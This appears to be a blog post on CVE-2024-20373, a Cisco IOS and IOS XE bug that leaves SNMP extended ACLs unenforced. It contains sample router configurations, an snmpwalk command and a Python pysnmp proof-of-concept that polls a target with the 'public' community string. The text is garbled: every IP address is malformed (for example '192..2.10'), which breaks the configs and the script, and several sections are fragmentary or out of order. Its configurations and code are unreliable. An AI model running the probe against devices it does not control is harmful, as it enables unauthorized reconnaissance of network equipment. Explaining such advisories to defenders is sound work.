CVE-2024-20373 - Cisco SNMP ACL Bypass – How a Simple Misconfiguration Could Put Your Network at Risk

On June 5, 2024, Cisco publicly disclosed CVE-2024-20373, a newly discovered vulnerability that affects their IOS and IOS XE software. This flaw allows remote, unauthenticated attackers to poll SNMP on targeted routers and switches—even when the devices are configured to reject such requests. If you manage Cisco infrastructure, understanding and mitigating this issue is critical to your network’s security.

In this long-read post, we’ll break down the vulnerability in plain English, explain how attackers can leverage it, and walk through what you can do to protect your environment—complete with code examples and references to Cisco’s official documentation.

In Plain English: What’s the Problem?

Simple Network Management Protocol (SNMP) lets admins monitor and manage network gear. For security, you control access to SNMP using Access Control Lists (ACLs), which should—on paper—let you permit or deny management traffic based on IP ranges, or more finely-tuned rules.

With CVE-2024-20373, an attacker can bypass those ACLs!

The issue centers around IPv4 extended named ACLs. Cisco IOS and IOS XE let admins assign extended named IPv4 ACLs to the SNMP server configuration, but these operating systems do *not* actually support this feature for SNMP. Unfortunately, Cisco’s software fails to warn you about this misconfiguration. The result: SNMP access controls are silently disabled for that SNMP server.

Key details

- The attacker can remotely read (“poll”) SNMP if they have valid SNMP community string or SNMPv3 credentials.

What Makes This Serious?

Many companies set up SNMP ACLs to lock down which remote hosts can monitor sensitive device status, routing tables, interface stats, and more. If those controls silently disappear, a remote attacker with a leaked or guessed SNMP community string can gain powerful insight into your network’s devices—even if your config should have blocked them.

Let’s look at a typical (but vulnerable) configuration

ip access-list extended SNMP-ACL
  permit udp 192..2.10 ... any eq snmp
  deny   ip any any

snmp-server community public RO SNMP-ACL

This appears to configure SNMP access such that only 192..2.10 can poll SNMP, and all others are denied. But here’s the catch: IOS and IOS XE don’t support extended ACLs for SNMP! When you use ip access-list extended ... here, IOS silently drops access control; essentially, you’re wide open (as long as the attacker knows the SNMP credentials).

You must use a *standard* IPv4 ACL

access-list 10 permit 192..2.10
snmp-server community public RO 10

This configuration is enforced—only 192..2.10 can poll SNMP.

The attacker discovers (or guesses) an affected Cisco device.

- The device is running IOS or IOS XE with an extended IPv4 ACL attached to snmp-server community.

Here’s a sample attack using the snmpwalk tool

snmpwalk -v2c -c public 203..113.1 sysDescr

If public is valid and device is vulnerable (with an extended ACL), the attacker receives the device’s SNMP data—even if their IP is *not* in the allowed range.

Proof-of-Concept

Below is a simple proof-of-concept script using Python and the pysnmp library that attempts to poll a device. If the configured access-control fails, you may receive device information unexpectedly.

from pysnmp.hlapi import *

target_ip = '203..113.1'
community = 'public'

for (errorIndication, errorStatus, errorIndex, varBinds) in nextCmd(
    SnmpEngine(),
    CommunityData(community, mpModel=1),  # SNMPv2c
    UdpTransportTarget((target_ip, 161)),
    ContextData(),
    ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', )),
    lexicographicMode=False
):
    if errorIndication or errorStatus:
        print('Access not permitted.')
        break
    for varBind in varBinds:
        print(' = '.join([x.prettyPrint() for x in varBind]))

Upgrade IOS or IOS XE:

Cisco has released software updates. Review the official advisory for patched versions.

SNMPv3 Encouraged:

Use SNMPv3 wherever possible; it’s more secure as it requires explicit user credentials and supports encryption.

Further Reading & Official References

- Cisco Security Advisory for CVE-2024-20373
- Cisco Documentation: SNMP Community Strings
- Cisco Access Lists Explained
- Common SNMP Tools

Summary

CVE-2024-20373 fosters a security gap by allowing SNMP queries through ACLs that *should* block them—putting your network at risk.

Update your firmware as soon as possible.

Stay safe—because security should never depend on “silent misconfigurations.”


*This post is an exclusive, plain-English breakdown tailored for network admins, blue teams, and interested security professionals. For questions, explore the official Cisco advisory or start a conversation in public tech forums!*

Timeline

Published on: 11/15/2024 15:15:06 UTC